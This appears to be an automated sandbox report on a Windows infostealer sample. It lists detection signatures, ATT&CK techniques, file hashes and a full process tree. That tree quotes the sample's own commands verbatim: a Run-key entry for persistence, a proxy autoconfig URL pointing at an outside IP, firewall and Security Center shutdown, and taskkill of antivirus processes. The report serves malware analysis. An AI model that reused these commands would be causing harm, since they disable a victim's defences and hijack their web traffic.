Overview

overview

10

Static

static

3

b6a780d8d5...18.exe

windows7-x64

10

b6a780d8d5...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    130s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    22-08-2024 06:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b6a780d8d5c7786c5f10cb9f96fddf51_JaffaCakes118.exe

  • Size

    179KB

  • MD5

    b6a780d8d5c7786c5f10cb9f96fddf51

  • SHA1

    3521bfb3f50d4ad831e8f52fda4c5f536a213ae6

  • SHA256

    9327363fb599980ef259feabaadad4bbb7aa724b2315796df62e1a2f0e9c5a78

  • SHA512

    0762471708f0fc8f7461a7760d5b2414a7f94cfa314d959d498559199edc14d602c270963fa351bd7c89de88fdb14fa9f23d08ad6c4b01aac95ee48dde23c459

  • SSDEEP

    3072:oYP2XerzhOUxu/XUtauVL2efff5W9FoP/UT7wrKr0uz:ou2urzh9xu/XkauVLj56FoP7KoO

Score
10/10
discoveryevasionexecutionpersistenceprivilege_escalationspywarestealerupx

Malware Config

Signatures

  • Disables service(s) 3 TTPs
    evasionexecution
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

    discovery
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Kills process with taskkill 20 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\b6a780d8d5c7786c5f10cb9f96fddf51_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\b6a780d8d5c7786c5f10cb9f96fddf51_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2312
    • C:\Users\Admin\AppData\Local\Temp\arquivo.exe
      "C:\Users\Admin\AppData\Local\Temp\arquivo.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2772
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\7E54.tmp\arquivo.bat" "
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2832
        • C:\Users\Admin\AppData\Local\Temp\ph.exe
          ph.exe
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2820
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\7EE0.tmp\video.bat" "
            5⤵
            • Drops file in Drivers directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2700
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo y"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2804
            • C:\Windows\SysWOW64\reg.exe
              C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "JavaUpdateSched" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\jusched.exe"
              6⤵
              • Adds Run key to start application
              • System Location Discovery: System Language Discovery
              PID:1884
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo y"
              6⤵
                PID:608
              • C:\Windows\SysWOW64\reg.exe
                C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "198.173.127.140pt-BR.js" /f
                6⤵
                • System Location Discovery: System Language Discovery
                PID:2452
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo y"
                6⤵
                • System Location Discovery: System Language Discovery
                PID:1792
              • C:\Windows\SysWOW64\reg.exe
                C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t reg_dword /d 00000001 /f
                6⤵
                  PID:2240
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:2676
                • C:\Windows\SysWOW64\reg.exe
                  C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t reg_dword /d 00000000 /f
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:2132
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:2076
                • C:\Windows\SysWOW64\reg.exe
                  C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t reg_dword /d 00000000 /f
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:2128
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                  6⤵
                    PID:2156
                  • C:\Windows\SysWOW64\reg.exe
                    C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "Autoconfig" /t reg_dword /d 00000001 /f
                    6⤵
                      PID:2372
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                      6⤵
                      • System Location Discovery: System Language Discovery
                      PID:1976
                    • C:\Windows\SysWOW64\reg.exe
                      C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "AdvancedTab" /t reg_dword /d 00000001 /f
                      6⤵
                      • System Location Discovery: System Language Discovery
                      PID:264
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                      6⤵
                      • System Location Discovery: System Language Discovery
                      PID:2668
                    • C:\Windows\SysWOW64\reg.exe
                      C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
                      6⤵
                        PID:2916
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo y"
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:2896
                      • C:\Windows\SysWOW64\reg.exe
                        C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "198.173.127.140pt-BR.js" /f
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:2564
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo y"
                        6⤵
                          PID:3032
                        • C:\Windows\SysWOW64\reg.exe
                          C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t reg_dword /d 00000001 /f
                          6⤵
                          • System Location Discovery: System Language Discovery
                          PID:1524
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                          6⤵
                            PID:1576
                          • C:\Windows\SysWOW64\reg.exe
                            C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t reg_dword /d 00000000 /f
                            6⤵
                            • System Location Discovery: System Language Discovery
                            PID:1724
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo y"
                            6⤵
                            • System Location Discovery: System Language Discovery
                            PID:2484
                          • C:\Windows\SysWOW64\reg.exe
                            C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t reg_dword /d 00000000 /f
                            6⤵
                              PID:1276
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                              6⤵
                              • System Location Discovery: System Language Discovery
                              PID:2640
                            • C:\Windows\SysWOW64\reg.exe
                              C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "Autoconfig" /t reg_dword /d 00000001 /f
                              6⤵
                              • System Location Discovery: System Language Discovery
                              PID:2796
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                              6⤵
                              • System Location Discovery: System Language Discovery
                              PID:2904
                            • C:\Windows\SysWOW64\reg.exe
                              C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "AdvancedTab" /t reg_dword /d 00000001 /f
                              6⤵
                              • System Location Discovery: System Language Discovery
                              PID:2912
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                              6⤵
                                PID:2928
                              • C:\Windows\SysWOW64\reg.exe
                                C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
                                6⤵
                                • System Location Discovery: System Language Discovery
                                PID:2088
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c dir "\Users\Admin\.." /b /s | find "prefs.js"
                                6⤵
                                • System Location Discovery: System Language Discovery
                                PID:756
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" dir "\Users\Admin\.." /b /s "
                                  7⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2972
                                • C:\Windows\SysWOW64\find.exe
                                  find "prefs.js"
                                  7⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2448
                              • C:\Windows\SysWOW64\attrib.exe
                                C:\Windows\system32\attrib.exe -r -a -s -h "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\prefs.js"
                                6⤵
                                • System Location Discovery: System Language Discovery
                                • Views/modifies file attributes
                                PID:2824
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c dir "\Users\Admin\.." /b /s | find "prefs.js"
                                6⤵
                                • System Location Discovery: System Language Discovery
                                PID:2432
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" dir "\Users\Admin\.." /b /s "
                                  7⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1120
                                • C:\Windows\SysWOW64\find.exe
                                  find "prefs.js"
                                  7⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1224
                              • C:\Windows\SysWOW64\attrib.exe
                                C:\Windows\system32\attrib.exe -r -a -s -h "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\prefs.js"
                                6⤵
                                • System Location Discovery: System Language Discovery
                                • Views/modifies file attributes
                                PID:932
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c dir "\Users\Admin\.." /b /s | find "prefs.js"
                                6⤵
                                • System Location Discovery: System Language Discovery
                                PID:2356
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" dir "\Users\Admin\.." /b /s "
                                  7⤵
                                    PID:408
                                  • C:\Windows\SysWOW64\find.exe
                                    find "prefs.js"
                                    7⤵
                                      PID:2192
                                  • C:\Windows\SysWOW64\attrib.exe
                                    C:\Windows\system32\attrib.exe +r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\prefs.js"
                                    6⤵
                                    • Views/modifies file attributes
                                    PID:1764
                                  • C:\Windows\SysWOW64\reg.exe
                                    C:\Windows\system32\reg.exe export HKU C:\Users\Admin\AppData\Local\Temp\~r.tmp
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:668
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\Admin\AppData\Local\Temp\~r.tmp "
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1332
                                  • C:\Windows\SysWOW64\find.exe
                                    C:\Windows\system32\find.exe "Internet Explorer\Main"
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1164
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c type C:\Users\Admin\AppData\Local\Temp\~i.tmp | C:\Windows\system32\find.exe "S-1-5-21"
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1620
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\Admin\AppData\Local\Temp\~i.tmp "
                                      7⤵
                                        PID:680
                                      • C:\Windows\SysWOW64\find.exe
                                        C:\Windows\system32\find.exe "S-1-5-21"
                                        7⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1664
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                      6⤵
                                        PID:2260
                                      • C:\Windows\SysWOW64\reg.exe
                                        C:\Windows\system32\reg.exe add "HKU\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnonBadCertRecving" /t REG_DWORD /d "0x00000000" /f
                                        6⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1704
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                        6⤵
                                          PID:2120
                                        • C:\Windows\SysWOW64\reg.exe
                                          C:\Windows\system32\reg.exe add "HKU\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnOnIntranet" /t REG_DWORD /d "0x00000000" /f
                                          6⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:292
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                          6⤵
                                            PID:2664
                                          • C:\Windows\SysWOW64\reg.exe
                                            C:\Windows\system32\reg.exe add "HKU\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap" /v "AutoDetect" /t REG_DWORD /d "0x00000000" /f
                                            6⤵
                                              PID:2200
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                              6⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2492
                                            • C:\Windows\SysWOW64\reg.exe
                                              C:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 0x00000001 /f
                                              6⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:1924
                                            • C:\Program Files\Internet Explorer\iexplore.exe
                                              "C:\Program Files\Internet Explorer\iexplore.exe" "http://ver.download-ccf.com/ver.php"
                                              6⤵
                                              • Modifies Internet Explorer settings
                                              • Suspicious use of FindShellTrayWindow
                                              • Suspicious use of SetWindowsHookEx
                                              PID:2784
                                              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2784 CREDAT:275457 /prefetch:2
                                                7⤵
                                                • System Location Discovery: System Language Discovery
                                                • Modifies Internet Explorer settings
                                                • Suspicious use of SetWindowsHookEx
                                                PID:2840
                                        • C:\Windows\SysWOW64\net.exe
                                          net stop wscsvc
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of WriteProcessMemory
                                          PID:2848
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 stop wscsvc
                                            5⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2596
                                        • C:\Windows\SysWOW64\sc.exe
                                          sc config wscsvc start= disabled
                                          4⤵
                                          • Launches sc.exe
                                          • System Location Discovery: System Language Discovery
                                          PID:1320
                                        • C:\Windows\SysWOW64\netsh.exe
                                          netsh firewall set opmode mode=disable
                                          4⤵
                                          • Modifies Windows Firewall
                                          • Event Triggered Execution: Netsh Helper DLL
                                          • System Location Discovery: System Language Discovery
                                          PID:2176
                                        • C:\Windows\SysWOW64\net.exe
                                          net stop SharedAccess
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:1520
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 stop SharedAccess
                                            5⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2880
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im avgcc.exe
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2892
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im avgcc.exe
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2068
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im avgamsvr.exe
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2472
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im avgupsvc.exe
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2332
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im avgw.exe
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1628
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im avgcc32.exe
                                          4⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1244
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im avgctrl.exe
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1560
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im avgserv.exe
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1400
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im avgserv9.exe
                                          4⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2252
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im avgserv9schedapp.exe
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1964
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im avgw.exe
                                          4⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:776
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im ashwebsv.exe
                                          4⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:328
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im ashdisp.exe
                                          4⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2516
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im ashmaisv.exe
                                          4⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2380
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im ashserv.exe
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2780
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im ashwebsv.exe
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2576
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im norton.exe
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3044
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im Norton Auto-Protect.exe
                                          4⤵
                                          • Kills process with taskkill
                                          PID:836
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im norton_av.exe
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:272
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im nortonav.exe
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2072

                                  Network

                                  MITRE ATT&CK Enterprise v15

                                  Reconnaissance

                                  Resource Development

                                  Initial Access

                                  Execution

                                  System Services

                                  1
                                  T1569

                                  Service Execution

                                  1
                                  T1569.002

                                  Persistence

                                  Boot or Logon Autostart Execution

                                  1
                                  T1547

                                  Registry Run Keys / Startup Folder

                                  1
                                  T1547.001

                                  Create or Modify System Process

                                  2
                                  T1543

                                  Windows Service

                                  2
                                  T1543.003

                                  Event Triggered Execution

                                  1
                                  T1546

                                  Netsh Helper DLL

                                  1
                                  T1546.007

                                  Privilege Escalation

                                  Boot or Logon Autostart Execution

                                  1
                                  T1547

                                  Registry Run Keys / Startup Folder

                                  1
                                  T1547.001

                                  Create or Modify System Process

                                  2
                                  T1543

                                  Windows Service

                                  2
                                  T1543.003

                                  Event Triggered Execution

                                  1
                                  T1546

                                  Netsh Helper DLL

                                  1
                                  T1546.007

                                  Defense Evasion

                                  Hide Artifacts

                                  1
                                  T1564

                                  Hidden Files and Directories

                                  1
                                  T1564.001

                                  Impair Defenses

                                  1
                                  T1562

                                  Disable or Modify System Firewall

                                  1
                                  T1562.004

                                  Modify Registry

                                  2
                                  T1112

                                  Credential Access

                                  Unsecured Credentials

                                  1
                                  T1552

                                  Credentials In Files

                                  1
                                  T1552.001

                                  Discovery

                                  Network Share Discovery

                                  1
                                  T1135

                                  System Information Discovery

                                  1
                                  T1082

                                  System Location Discovery

                                  1
                                  T1614

                                  System Language Discovery

                                  1
                                  T1614.001

                                  Lateral Movement

                                  Collection

                                  Data from Local System

                                  1
                                  T1005

                                  Command and Control

                                  Exfiltration

                                  Impact

                                  Service Stop

                                  1
                                  T1489

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                    Filesize

                                    342B

                                    MD5

                                    d95659c4842d5862d6782e8401098cdf

                                    SHA1

                                    f2cacb200749e2d3f9d7608e32e98d2c92d03822

                                    SHA256

                                    df719cfbdfd0d55cbf4062b990a02bc6202ac6cf9406aafb191f307ed1cae9f6

                                    SHA512

                                    e7695fa26c710095acadd7bf152a9e6c0ce7b43aa0b439d50f6af5cfc2c606f092b42c83ba77ba19d2d2ec3e73758cea3599d0e1d1ea3aa364cdc28af735537a

                                    Download Submit

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                    Filesize

                                    342B

                                    MD5

                                    0b78cbafed32ce6407ff3f38c9cadfae

                                    SHA1

                                    75077a48e234f8954f81209982c30dcc06b167cc

                                    SHA256

                                    04e3e4343f619ed44810de0e0ab8767f38a5a1a5b11a5fa576a59121fd10049a

                                    SHA512

                                    54658469e8f7ba1291339e840f466a69f1226fefbdc13e36657093f625bdf995da8a45202c87bc3044e1564df842cfb7e8b4f225c00b965bdbb7f49aee271713

                                    Download Submit

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                    Filesize

                                    342B

                                    MD5

                                    dd8a59e9096a5a52f05117b60d300dcf

                                    SHA1

                                    79968c1fffb629f98bdb0fbb7792c7364f866004

                                    SHA256

                                    d24baa9f4a8f3bd1df7d8067122bca4a1bc8f86b833f3afbc53c5e270d6b659d

                                    SHA512

                                    b340d663d7e996bb72cc91c1bad26a5156c4438ab5e1e1ee399dbaa04db5ad3ccd3d641a8504f187b3133b4c3f39531751f043a1fd96a6801ecab02ddd929ac6

                                    Download Submit

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                    Filesize

                                    342B

                                    MD5

                                    8ad0cbb87a56b66060e86e0c5eb818d0

                                    SHA1

                                    897fdadca775e1dd15321d9f61563fc7693e6621

                                    SHA256

                                    c70e1d5aa14d1c59895dcbeb3ee0b0c4ab601d49f2e7e2c2ddb6f79f00348024

                                    SHA512

                                    572042ef911fb3adf288e4821737b3f0019d07292f0faa33fd55ee2c5082a12e758580c51833626df409258db083dfe01d5db6190fa325e6736ca5db9144414d

                                    Download Submit

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                    Filesize

                                    342B

                                    MD5

                                    444d9447fded8be45e49757c80e70228

                                    SHA1

                                    0b6677dbeacbd5d698089c75b5aa7054d622b862

                                    SHA256

                                    d5d16d0dd2f1f8b462ddf4e5395b5b5e7a97f2a17c466e24d9602ea1827e455a

                                    SHA512

                                    acabeb5c53a95733d982b77786232178390cf023775b09cece49dd5955072501004f4fdb655dce2c2ca69113311afacabcde20933c0a40a0fc0c5680fa6f36de

                                    Download Submit

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                    Filesize

                                    342B

                                    MD5

                                    46ce7ebad67a3d3129e2152974007104

                                    SHA1

                                    9687604083a5e0a21b25f249329af05186015471

                                    SHA256

                                    e68c15920934cbceaa2adbcb270ec4eeee67bac07b990cd50e878a1bc84a4265

                                    SHA512

                                    c5a2e5768cc14cc9c017bbb58987229e10dbf4bd30802d6033b16815472f70019326e4b6808f948b65a2e39c574ab6c5364abfafbeb45fbd3e15a7ddeb4537eb

                                    Download Submit

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                    Filesize

                                    342B

                                    MD5

                                    da61cd057f54c3f76f20a57b3e2b934c

                                    SHA1

                                    36f88fb7e74ee4aeb51133b6b058508a4618cdb9

                                    SHA256

                                    e25ce92ee1181a20dda14becad827b934f4c575ece2da0aa9660bd3647bd6789

                                    SHA512

                                    f6c76064a3238ae19513ecccc64004120060f8ed28678d105db56b5c37c5287eaaf328d8670d2a7e7f4e0a82695a5131a9506cfef557e8edf76b473cb50bbba1

                                    Download Submit

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                    Filesize

                                    342B

                                    MD5

                                    1b6d0c1d90625d1f8eef8cc9da9a7dc4

                                    SHA1

                                    54fd24d6742465ce5a5fe1b74097235607344f3f

                                    SHA256

                                    8a522811d16b280cf2bb3bbc2805e828330d476ca389cf46576bdc66abfb4daa

                                    SHA512

                                    a58c94f99d8282d13a2cb85c3095d929a3b5949f2b90651d34d5e7b39aebec1bc5676cc6976e22b3f9cf89c7b472f8e90385851d086532f63c39e35647a356c4

                                    Download Submit

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                    Filesize

                                    342B

                                    MD5

                                    b6e83661d32aaa50c6f1180a05505ac2

                                    SHA1

                                    f035fa58ebb0ce2a90a25c4991e287ee5ef75216

                                    SHA256

                                    4041aab20919db76ad23dd7a3880dcc53c532e1bef7a0e3304e009e0a24327f0

                                    SHA512

